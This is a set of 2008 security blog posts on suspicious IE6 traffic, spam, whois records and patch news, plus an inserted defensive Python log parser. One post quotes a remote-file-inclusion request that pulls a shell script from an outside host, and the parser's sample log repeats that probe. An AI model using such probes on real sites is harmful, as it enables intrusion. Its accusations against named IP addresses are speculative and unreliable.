Monday, March 31, 2008

Further Convinced IE6 is used for maliciousness

I am further convinced that users of IE6 or their computers are up to no good and that at least a part of your IE6 traffic is bogus and used for purposes other than for people to learn about and buy your products and services.

Not only do most IE6 users not upgrade their browser after being locked out of the site (which was done as a test to see whether this traffic is legitimate), but most of the traffic is a one-off hit, not from regular users of these sites, who are typically frequent visitors looking for updated information. Long-time legitimate users are not typically the ones using IE6; it is the random one-off visitor hitting odd sites that it would be very strange for them to be visiting in the first place.

For instance, there's an IP in Brazil - a known big source of spam - hitting a site over and over again with different browsers probably trying to decipher how to crack through this blocking. They are looking at a site with Christmas related items. It is doubtful that at this time of year someone in Brazil is trying that hard to view Christmas decorations in the US that are not even for sale online.

As a side note a lot of people from Brazil travel to a location related to a travel booking site we run - could this be a travel agent or criminal in Brazil trying to copy the site and direct traffic to them instead of us?

Here's the IP: 201.77.3.1


Saturday, March 29, 2008

Google Gets Into Security Outsourcing

This is very interesting and I like it, for the most part, because I think a company with lots of money will need to do this to really be effective:

Google bought Postini and is offering small businesses a way to "outsource" their security. Now, there are many aspects of security and this does not exactly cover the things I mentioned in my last post. That's a different animal. The portion of security in this case is scanning emails before they get to you and web site responses before they get to you.

Outsourced Security

The thing about Google is that they have a lot of really smart people and money. And I have a feeling Google might have a little bit of a bent to help make the world a better place. The way Google can really help would be to consolidate anonymous access to all this data coming from bots and hacked computers, spammers, scammers and criminals, and use it to prosecute the offenders.

This is not an easy task as many criminals are outside the US or perhaps inside the US doing their dirty work through people outside the US or perhaps outside the US masquerading as people inside the US. Anything crossing international borders is going to be tricky and probably involve some politicians.

And in general, tackling this big problem is going to cost a lot of money to stay on top of the analysis, to do this thing right and really stay ahead of the hackers, who are some really smart brains whose day is spent 100% trying to figure out how to crack your password, hack your system, steal the money in your bank account, divert your business to themselves, etc.

There is one thing about this solution that bothers me, however. If Google sets up a bunch of proxy servers for small businesses, are they going to pass through legitimate information about the person making a request on your web site? Or will all the requests look like they are coming from Google? That gives Google a stranglehold on a lot of marketing people, which is not a good idea. It also sets up the service to work like AOL, which is a haven for hackers and criminals who want to hide their identity. That is my only concern so far about this service, which is otherwise great.

The Cost of Cheap Web Sites

Ok, so you figured it out and you threw your cheap PHP site online and you think you're cool, right? But if you're not monitoring your site carefully and updating to get all the latest patches (constantly), you may be aiding and abetting hackers, phishers and spammers.

http://www.networkworld.com/news/2008/032808-google-search-behind-most-phishing.html

If you don't know what you're doing, use a system from a company that has security built in and handles all the hosting and security for you (man in the middle, SQL injection, cross-site scripting, bot traffic filtering, code injection, OS updates, web platform updates and constant monitoring of security issues) and help make the world a better place. There are places you can get "cheap" web sites if you really want one without creating these problems for the rest of the world.

The problem is really that all these people who go out and get cheap and free web sites and don't know what they are doing create headaches for the rest of the world, which foots the bill when their web site gets hacked and is used for malicious purposes.

IE6 - Fake Traffic or Surrogate Traffic

This is a prediction which I cannot exactly prove yet, but I am guessing something like this might be going on - and perhaps this is old news because I don't know every security vulnerability that exists for IE6.

My guess is that much of your traffic coming to your web server from IE6 may in fact not be traffic from the person who owns that computer or server. I am guessing that much of the IE6 traffic you see in your logs is a third party who has hijacked that machine, browser, or maybe a session or whatever to hide their true identity while sniffing around for security problems, hijacking your web site content, or possibly blocking search engines from getting to your site to hurt your rankings...not sure but there's something really weird about all the IE6 traffic on my server.

And even more odd is that when this traffic is blocked with a request to upgrade the browser, the user of that machine doesn't upgrade. I find it hard to believe that with all the security hype and fear of stolen identity and access to bank accounts that these users refuse to upgrade their browser. I think maybe these are old machines sitting around that have a browser on them that isn't even used, perhaps, and some hacker has gotten onto it and uses it to hide the true source of the traffic.

Friday, March 28, 2008

PHP hack - shell - 216.191.16.12

IP address 82.210.107.191 is attempting to get to one of our URLs with a URL that ends in a PHP page like this:

main.php?pageURL=http://216.191.16.12/.shell/site/iyes.txt??

Apparently there is another PHP hack on the loose.
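The request above (a page parameter that carries a remote URL) and the IE6 patterns described in the posts above (single-hit IE6 visitors, one address retrying a blocked page with different browsers) can all be spotted from a web server's access log. The following Python example is added here and is not the blog's own code; it parses constructed Apache combined-format lines (RFC 5737 test addresses, a made-up remote host) and flags those three patterns.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (Apache combined format, RFC 5737 test
# addresses); these lines are not taken from the blog author's server.
SAMPLE_LOG = """\
192.0.2.10 - - [31/Mar/2008:10:02:11 -0500] "GET /christmas/lights.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [31/Mar/2008:10:02:40 -0500] "GET /christmas/lights.html HTTP/1.1" 403 310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.13"
198.51.100.7 - - [28/Mar/2008:03:14:07 -0500] "GET /main.php?pageURL=http://203.0.113.5/.s/x.txt?? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.20 - - [28/Mar/2008:09:00:01 -0500] "GET /main.php?pageURL=news HTTP/1.1" 200 8800 "http://www.google.com/search?q=news" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.13"
198.51.100.31 - - [28/Mar/2008:09:05:44 -0500] "GET /index.html HTTP/1.1" 200 4400 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]

def remote_url_params(target):
    """Query parameters whose value is itself an absolute URL, the shape of the
    include()-style remote file inclusion probe quoted in the post above."""
    return [(k, v) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if urlsplit(v).scheme in ("http", "https", "ftp")]

def rfi_attempts(records):
    """(ip, request target) for every request that carries a remote-URL parameter."""
    return [(r["ip"], r["target"]) for r in records if remote_url_params(r["target"])]

def ie6_one_off_ips(records):
    """IPs that made exactly one request, and made it with an MSIE 6 agent:
    the 'one-off hit' profile the IE6 posts describe."""
    hits = defaultdict(list)
    for r in records:
        hits[r["ip"]].append(r["ua"])
    return sorted(ip for ip, uas in hits.items() if len(uas) == 1 and "MSIE 6" in uas[0])

def ua_switching_ips(records):
    """IPs that presented more than one distinct User-Agent, like the address that
    kept retrying a blocked page with different browsers."""
    agents = defaultdict(set)
    for r in records:
        agents[r["ip"]].add(r["ua"])
    return sorted(ip for ip, s in agents.items() if len(s) > 1)
```

Run the three functions over `parse_log(open("access.log").read())` to get the same three lists for a real log; a legitimate visitor can of course appear in the one-off list, so treat it as a triage queue rather than a block list.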

Thursday, March 27, 2008

Suspicious and possibly related IPs

I think at least some of these computers have something in common - like they are hacked or run by hackers. In particular the IP address 96.10.27.184 is clearly trying to alter the user agent in their request. I am pretty sure some of the others are doing the same. A few of them may be people who just need to update their browsers to the latest version.

Another interesting thing is that most of these visits were referred by Google for whatever that is worth.


Wednesday, March 26, 2008

Offshore Fraud Alerts

I was watching American Greed on CNBC and listening to all the scams people fall for (if it's too good to be true...it probably is) and learned about this web site, Offshore Alert, which has information on various offshore scams.

Sunday, March 23, 2008

IP Range lists Two Country Codes

This IP range lists two country codes - Belgium and The Netherlands:

inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL


Saturday, March 22, 2008

Do you know where your email address is listed?

Go to Google and type in your email address.

If you don't like where it's listed, report it to Google and the web site owner to try to get it removed.

Good luck.

Many news groups publish people's names and email addresses on web sites - and not only that, these news groups get copied to all kinds of third-party sites - so your name and email address are spread all over search engine results.

This makes it extremely easy for hackers and spammers who scan web pages to pick up your email address all over the place.

One site changed all the email addresses to something like this: name <at> emailaddress.com

That doesn't really hide the address.

Try to contact these web sites and ask them to remove your name and email address. Some of them will do it. After many contacts some web sites still have not responded and other web sites have said they will remove the pages but it takes forever for them to remove it and even longer for it to be removed from search engine caches so it doesn't show up in search engine listings.

Should it be legal to post someone's private contact information without consent?

Sunday, March 16, 2008

Code Injected Into Trend Micro Web Site

Trend Micro has some security software among other things so it is ironic that their web site was the victim of a code injection attack which apparently sent people to some evil sites in China. This reinforces that web site hacks are more prevalent than most companies realize or admit: Trend Micro Web Site Hacked

Hack - quoted identifiers - SQL 2000

Depending on how quoted identifiers are set in SQL 2000, certain SQL injection hacks related to what is explained here may be a problem:

http://www.sqlteam.com/article/quoted-identifiers-in-sql-server-2000

APNIC IP reports US address

This IP range should be moved to ARIN or fixed to indicate the correct location:

Inetnum: 203.187.128.0 - 203.187.159.255
netname: INFONET-AP-02
descr: BT-Infonet, Internet Service Provider
descr: 2160 E. Grand Ave. El Segundo, CA90245
country: US

Spam Viruses on the Rise

Google reports that Spam Viruses are on the rise in this report from eweek:

Spam Viruses on the Rise

And on that note I must say my mailbox is even more full of spam messages with attachments, and the particularly spammed mailbox is one registered on a bunch of social networking and job-related web sites, a few user group mailing lists, and of course mailing lists like eweek and other Internet industry mailing lists.

Other than that I barely use that email address for communication anymore due to all the problems.

So is all this spam the result of putting my name on some social networking site somewhere?

As a matter of fact I tried out Facebook for a while just to see what all the hubbub was about, and I got sent so many of these stupid applications and postings from friends that I just did not believe were legitimately from my friends. I would see that two random and unrelated people were challenged to a game, for instance, or received a similar post, and I started to wonder if some of those things were fake. I'm sure they were, but basically I never clicked on any of them (sorry all you Facebook friends out there) because I know that these apps from random sites could contain things that are harmful to my computer, and who knows what is in them or where they came from...and even the ones I did sign up for from bigger name software makers I wondered about.

So yeah, I really believe this and I wonder if the makers of some of the executive type social networking sites are actually using that information illegally - or those systems are getting hacked for that purpose, which is why in part I do not fully use them.

Wednesday, March 12, 2008

Top 10 Web Vulnerabilities - Q4 2007

Report of top 10 web vulnerabilities - Q4 2007 states that 29% of vulnerabilities are attributable to network and infrastructure, while 71% are attributable to both open source and commercial web applications.

PHP represents 30% of all vulnerabilities. Ahem. I have mentioned this before and I still think PHP is a majorly hacked platform because people think it is "easy and cheap" and well, yes, until you get hacked. That's not to say PHP cannot be secure. It's just that the relative ease of tacking together an application that can be blown over in the wind makes it attractive for use by people who want to think they are programmers without understanding the underlying fundamentals of programming, software, web applications or security.

But then, there are many other serious applications, vendors and open source tools that have been hacked on the top 10 list, such as the #1 issue - OpenSSL - a technology meant to encrypt your data in transit as a means of security.

Spyware Developer Pays $330,000 +

Spyware developer / hacker pays for creating spyware that infected millions of computers.

Cisco Will Send Patches On Routine Basis

Cisco to patch routers on regular schedule, 03/11/2008: Following the lead of Microsoft and Oracle, Cisco Systems will start releasing security patches for some of its products on a schedule.

Friday, March 07, 2008

Critical Java Security Patches

Secunia has a bunch of Java updates today for an issue that can cause remote code execution and DoS:

http://secunia.com/advisories/29239/

Wednesday, March 05, 2008

Old Browsers Are Security Risk

This is probably old news for most people but if someone is using an old browser in some cases it may be that an SSL certificate will not deliver 128 bit encryption. Here's the info from Verisign's web site:

Even though an SSL Certificate is capable of 128-bit or 256-bit encryption, many millions still use older computer systems that are incapable of strong encryption. (Building Blocks of Transparent Web Security: Server-Gated Cryptography, Yankee Group, 2005.) These legacy browsers and operating systems fail to step up to strong encryption without an SGC-enabled SSL Certificate:

Certain Internet Explorer browser versions from 4.01 to 5.01
Certain Netscape browser versions from 4.07 to 4.72
Many Windows 2000 systems using Internet Explorer
Internet Explorer browser versions prior to 3.02 and Netscape browser versions prior to 4.02 are not capable of 128-bit encryption with any SSL Certificate.
Verisign SSL Information

Choices are to use that way overpriced green bar SSL certificate that many vendors are not yet adopting, or block out old browsers from your web server and ask them to upgrade. The latter is not foolproof, but if someone wants to let their data get hacked that is their own problem.

Your virus scanner can't find this one...

Here's a rootkit that is nearly impossible to detect:

Mebroot Root Kit

And once again, the infamous IT experts all over this country said this type of thing was hypothetically possible but beyond the reach of most malware writers.

Verisign says 5000 people were discovered to be infected since this was discovered in December.

And check out what you have to do to detect it.

This thing can be installed onto your machine in a drive by visit to a web site.